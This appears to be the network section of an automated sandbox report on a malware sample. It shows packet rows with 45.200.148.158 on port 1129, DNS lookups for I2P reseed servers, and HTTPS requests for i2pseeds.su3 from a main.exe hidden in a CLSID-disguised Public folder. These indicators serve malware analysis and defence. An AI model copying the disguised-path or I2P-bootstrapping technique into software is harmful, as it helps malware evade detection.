Jan 11, 2025 20:26:08.357811928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.357812881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.357848883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358186007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358200073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358212948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358227015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358241081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358247042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358256102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358269930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358282089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358283043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358298063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358305931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358311892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358330965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358345985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358570099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358583927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358597040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358612061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358618975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358627081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358639956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358652115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358654022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358674049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358676910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358690977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358705044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358719110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358722925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358731985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358741999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358747005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358760118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358766079 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358774900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358788967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358798981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358803034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358817101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358831882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358836889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358846903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.358855009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.358875990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.359421968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359436035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359450102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359463930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359472990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.359478951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359493017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359494925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.359508038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.359555960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.451683998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451702118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451715946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451780081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.451823950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451838970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451854944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451863050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.451870918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451905966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.451978922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.451993942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452008963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452019930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452022076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452038050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452048063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452075958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452119112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452133894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452148914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452171087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452475071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452488899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452502966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452512026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452516079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452528954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452534914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452543974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452558041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452560902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452572107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452605009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452608109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452620983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452635050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452641010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452647924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452663898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452802896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452816963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452831030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452838898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452846050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452877998 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.452945948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452960014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.452981949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453087091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453100920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453114033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453124046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453128099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453142881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453147888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453156948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453170061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453192949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453212023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453366041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453381062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453394890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453409910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453416109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453423977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453438044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453439951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.453453064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.453473091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463176966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463320017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463341951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463356018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463370085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463383913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463382959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463397980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463409901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463428020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463450909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463645935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463660955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463674068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463685989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463686943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463701010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463715076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463716030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463726997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463741064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463746071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463754892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463764906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463768959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463783026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463797092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463810921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463816881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463824034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463838100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463845968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463851929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463865042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463881016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463887930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463893890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463907957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463917971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463921070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463936090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463937044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463952065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463964939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463964939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.463978052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463992119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.463999033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.464004993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.464018106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.464045048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470638037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470654011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470668077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470681906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470695972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470700026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470710039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470721960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470722914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470737934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470742941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470751047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470765114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470787048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470810890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470813990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470824957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470839024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470853090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470865965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470876932 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470880032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470894098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470906019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470907927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470922947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470928907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470944881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470958948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470962048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.470973015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470987082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.470990896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471000910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471009016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471019983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471035004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471040010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471049070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471062899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471067905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471076965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471091032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471103907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471110106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471117973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471132040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471138954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471147060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.471157074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.471187115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.536868095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536900043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536925077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536940098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536947966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.536963940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536973953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.536978960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.536994934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537009001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537024021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537029982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537039042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537054062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537055969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537067890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537067890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537084103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537101030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537106037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537131071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537405014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537420034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537435055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537447929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537452936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537489891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537565947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537580967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537594080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537609100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537621975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537628889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537636995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537648916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537671089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537811995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537826061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537839890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537853956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537862062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537868977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537883043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537894011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.537899017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.537931919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.538079977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.538094997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.538108110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.538115025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:08.538122892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.538139105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:08.538144112 CET	49730	1129	192.168.2.4	45.200.148.158

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 20:26:23.071763992 CET	192.168.2.4	1.1.1.1	0x3d55	Standard query (0)	reseed-pl.i2pd.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:26:24.233594894 CET	192.168.2.4	1.1.1.1	0x4ed6	Standard query (0)	reseed.i2pgit.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:26:24.919409990 CET	192.168.2.4	1.1.1.1	0x3d98	Standard query (0)	reseed.diva.exchange	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:27:39.310236931 CET	192.168.2.4	1.1.1.1	0xe338	Standard query (0)	reseed.onion.im	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 20:26:23.110090017 CET	1.1.1.1	192.168.2.4	0x3d55	No error (0)	reseed-pl.i2pd.xyz	185.226.181.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:26:24.272747040 CET	1.1.1.1	192.168.2.4	0x4ed6	No error (0)	reseed.i2pgit.org	68.183.196.133	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:26:24.958410025 CET	1.1.1.1	192.168.2.4	0x3d98	No error (0)	reseed.diva.exchange	80.74.145.70	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:27:39.357342958 CET	1.1.1.1	192.168.2.4	0xe338	No error (0)	reseed.onion.im	159.223.194.171	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	185.226.181.238	443	4124	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 19:26:23 UTC	104	OUT	GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2025-01-11 19:26:24 UTC	160	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 19:26:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	68.183.196.133	443	4124	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 19:26:24 UTC	103	OUT	GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2025-01-11 19:26:24 UTC	152	IN	HTTP/1.1 502 Bad Gateway Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 19:26:24 GMT Content-Type: text/html Content-Length: 157 Connection: close
2025-01-11 19:26:24 UTC	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	80.74.145.70	443	4124	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 19:26:25 UTC	106	OUT	GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
